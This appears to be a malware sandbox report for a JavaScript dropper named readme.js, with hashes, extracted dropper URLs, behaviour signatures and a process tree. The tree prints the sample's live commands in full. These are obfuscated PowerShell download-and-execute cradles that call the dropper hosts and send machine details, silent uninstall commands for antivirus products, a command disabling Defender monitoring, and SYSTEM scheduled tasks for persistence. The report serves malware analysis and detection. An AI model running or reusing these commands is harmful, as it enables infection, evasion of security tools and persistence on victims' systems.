d8b5eaae03098bead91ff620656b9cfc569e5ac1befd0f55aee4cdb39e832b09

General

Target

readme.js
Size

10KB
MD5

db49b6f1f379122685be9553c5cc0f37
SHA1

45788a5c0c0d97d9bed9c0e6115eca1edbad8ba6
SHA256

d8b5eaae03098bead91ff620656b9cfc569e5ac1befd0f55aee4cdb39e832b09
SHA512

1eae9f302d90b3a1887b9f74927bf9bfac0519ae0f4019497177eca3ac2086ed71b4296193bcf62ba493d7fe2e4d57f42ded79ed5e8789abca206a2185ebab23

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://t.zz3r0.com

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://t.zer9g.com

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://t.bb3u9.com

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

9 4052 powershell.exe
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3972 schtasks.exe
3872 schtasks.exe
4528 schtasks.exe
4324 schtasks.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

696 notepad.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

4052 powershell.exe
4052 powershell.exe
4052 powershell.exe
2260 powershell.exe
2260 powershell.exe
2260 powershell.exe

flow	pid	process
9	4052	powershell.exe

pid	process
3972	schtasks.exe
3872	schtasks.exe
4528	schtasks.exe
4324	schtasks.exe

pid	process
696	notepad.exe

pid	process
4052	powershell.exe
4052	powershell.exe
4052	powershell.exe
2260	powershell.exe
2260	powershell.exe
2260	powershell.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeIncreaseQuotaPrivilege	4052	powershell.exe
Token: SeSecurityPrivilege	4052	powershell.exe
Token: SeTakeOwnershipPrivilege	4052	powershell.exe
Token: SeLoadDriverPrivilege	4052	powershell.exe
Token: SeSystemProfilePrivilege	4052	powershell.exe
Token: SeSystemtimePrivilege	4052	powershell.exe
Token: SeProfSingleProcessPrivilege	4052	powershell.exe
Token: SeIncBasePriorityPrivilege	4052	powershell.exe
Token: SeCreatePagefilePrivilege	4052	powershell.exe
Token: SeBackupPrivilege	4052	powershell.exe
Token: SeRestorePrivilege	4052	powershell.exe
Token: SeShutdownPrivilege	4052	powershell.exe
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeSystemEnvironmentPrivilege	4052	powershell.exe
Token: SeRemoteShutdownPrivilege	4052	powershell.exe
Token: SeUndockPrivilege	4052	powershell.exe
Token: SeManageVolumePrivilege	4052	powershell.exe
Token: 33	4052	powershell.exe
Token: 34	4052	powershell.exe
Token: 35	4052	powershell.exe
Token: 36	4052	powershell.exe
Token: SeIncreaseQuotaPrivilege	4052	powershell.exe
Token: SeSecurityPrivilege	4052	powershell.exe
Token: SeTakeOwnershipPrivilege	4052	powershell.exe
Token: SeLoadDriverPrivilege	4052	powershell.exe
Token: SeSystemProfilePrivilege	4052	powershell.exe
Token: SeSystemtimePrivilege	4052	powershell.exe
Token: SeProfSingleProcessPrivilege	4052	powershell.exe
Token: SeIncBasePriorityPrivilege	4052	powershell.exe
Token: SeCreatePagefilePrivilege	4052	powershell.exe
Token: SeBackupPrivilege	4052	powershell.exe
Token: SeRestorePrivilege	4052	powershell.exe
Token: SeShutdownPrivilege	4052	powershell.exe
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeSystemEnvironmentPrivilege	4052	powershell.exe
Token: SeRemoteShutdownPrivilege	4052	powershell.exe
Token: SeUndockPrivilege	4052	powershell.exe
Token: SeManageVolumePrivilege	4052	powershell.exe
Token: 33	4052	powershell.exe
Token: 34	4052	powershell.exe
Token: 35	4052	powershell.exe
Token: 36	4052	powershell.exe
Token: SeDebugPrivilege	2260	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

wscript.execmd.exepowershell.exe

description	pid	process	target process
PID 648 wrote to memory of 2848	648	wscript.exe	cmd.exe
PID 648 wrote to memory of 2848	648	wscript.exe	cmd.exe
PID 2848 wrote to memory of 696	2848	cmd.exe	notepad.exe
PID 2848 wrote to memory of 696	2848	cmd.exe	notepad.exe
PID 2848 wrote to memory of 4052	2848	cmd.exe	powershell.exe
PID 2848 wrote to memory of 4052	2848	cmd.exe	powershell.exe
PID 4052 wrote to memory of 2452	4052	powershell.exe	cmd.exe
PID 4052 wrote to memory of 2452	4052	powershell.exe	cmd.exe
PID 4052 wrote to memory of 2260	4052	powershell.exe	powershell.exe
PID 4052 wrote to memory of 2260	4052	powershell.exe	powershell.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\readme.js
1⤵
- Suspicious use of WriteProcessMemory
PID:648

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b notepad C:\Users\Admin\AppData\Local\Temp\readme.js & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*MKLUFVRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')
2⤵
- Suspicious use of WriteProcessMemory
PID:2848

C:\Windows\system32\notepad.exe
notepad C:\Users\Admin\AppData\Local\Temp\readme.js
3⤵
- Opens file in notepad (likely ransom note)
PID:696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*MKLUFVRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4052

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c echo Set-MpPreference -DisableRealtimeMonitoring 1
4⤵
PID:2452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2260

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
4⤵
PID:3356

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
5⤵
PID:208

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
4⤵
PID:4076

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
5⤵
PID:3024

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
4⤵
PID:3032

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
5⤵
PID:1188

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
4⤵
PID:2116

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
5⤵
PID:1836

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
4⤵
PID:2932

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
5⤵
PID:2996

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
4⤵
PID:868

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
5⤵
PID:2052

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
4⤵
PID:3920

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
5⤵
PID:3124

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart
4⤵
PID:3872

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
4⤵
- Creates scheduled task(s)
PID:3972

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \eDTR6r3P4nC /F /tr "powershell -w hidden -c PS_CMD"
4⤵
- Creates scheduled task(s)
PID:3872

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn \eDTR6r3P4nC
4⤵
PID:4216

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn LmHfWZxK4\4aSTNpL0 /F /tr "powershell -w hidden -c PS_CMD"
4⤵
- Creates scheduled task(s)
PID:4528

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn LmHfWZxK4\4aSTNpL0
4⤵
PID:4732

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\FI1O5lZUNgL\C4tHFX /F /tr "powershell -w hidden -c PS_CMD"
4⤵
- Creates scheduled task(s)
PID:4324

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\FI1O5lZUNgL\C4tHFX
4⤵
PID:4288

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:3872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zz3'+'r0.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
1⤵
PID:4236

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zer'+'9g.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
1⤵
PID:4752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
1⤵
PID:4268

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
MD5
8a313b70fd641fc4e6fffb40391d0b4d

SHA1
22684fe19ecd7943ac18e622db0d7f161db500e8

SHA256
bd33eb064e32cf8d9af160e3304d3f0e1b90bdc9ab5116c16ba87d9a14060911

SHA512
5b72cd7e301ad3825bf1465840f52abb885c2481700df5dfa299c30aa6b61613dac8fc1386895cffec48b8229cba77085f672a80e42d7fd07c73eafd962e1246

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
b7ce5874fdff5e4fccdc0fbd21ae7971

SHA1
980d0d37b937620706eabba421e2e5b30a4b15f7

SHA256
1933f8e519dbd64305997d47fa8a68b2184a8a66ea1d187cc82d788e684fe4b9

SHA512
7e33fdf9cc1f1525b23fc960d2e8294d34272701100877a2a5b1028f32e7161e38d8e518bf41ddcca9a050755b05efa3cb86ba22c8e89e06555482a6ab04ee3b

Download Submit
memory/208-15-0x0000000000000000-mapping.dmp

Download
memory/696-3-0x0000000000000000-mapping.dmp

Download
memory/868-24-0x0000000000000000-mapping.dmp

Download
memory/1188-19-0x0000000000000000-mapping.dmp

Download
memory/1836-21-0x0000000000000000-mapping.dmp

Download
memory/2052-25-0x0000000000000000-mapping.dmp

Download
memory/2116-20-0x0000000000000000-mapping.dmp

Download
memory/2260-12-0x0000024FCF2E0000-0x0000024FCF2E1000-memory.dmp

Filesize
4KB

Download
memory/2260-10-0x00007FF91F520000-0x00007FF91FF0C000-memory.dmp

Filesize
9.9MB

Download
memory/2260-9-0x0000000000000000-mapping.dmp

Download
memory/2452-8-0x0000000000000000-mapping.dmp

Download
memory/2848-2-0x0000000000000000-mapping.dmp

Download
memory/2932-22-0x0000000000000000-mapping.dmp

Download
memory/2996-23-0x0000000000000000-mapping.dmp

Download
memory/3024-17-0x0000000000000000-mapping.dmp

Download
memory/3032-18-0x0000000000000000-mapping.dmp

Download
memory/3124-27-0x0000000000000000-mapping.dmp

Download
memory/3356-14-0x0000000000000000-mapping.dmp

Download
memory/3872-28-0x0000000000000000-mapping.dmp

Download
memory/3872-30-0x0000000000000000-mapping.dmp

Download
memory/3920-26-0x0000000000000000-mapping.dmp

Download
memory/3972-29-0x0000000000000000-mapping.dmp

Download
memory/4052-7-0x00000171E4140000-0x00000171E4141000-memory.dmp

Filesize
4KB

Download
memory/4052-6-0x00000171E3F90000-0x00000171E3F91000-memory.dmp

Filesize
4KB

Download
memory/4052-5-0x00007FF91F520000-0x00007FF91FF0C000-memory.dmp

Filesize
9.9MB

Download
memory/4052-4-0x0000000000000000-mapping.dmp

Download
memory/4076-16-0x0000000000000000-mapping.dmp

Download
memory/4216-31-0x0000000000000000-mapping.dmp

Download
memory/4236-32-0x00007FF91F520000-0x00007FF91FF0C000-memory.dmp

Filesize
9.9MB

Download
memory/4268-44-0x00007FF91F520000-0x00007FF91FF0C000-memory.dmp

Filesize
9.9MB

Download
memory/4288-43-0x0000000000000000-mapping.dmp

Download
memory/4324-42-0x0000000000000000-mapping.dmp

Download
memory/4528-35-0x0000000000000000-mapping.dmp

Download
memory/4732-36-0x0000000000000000-mapping.dmp

Download
memory/4752-38-0x00007FF91F520000-0x00007FF91FF0C000-memory.dmp

Filesize
9.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads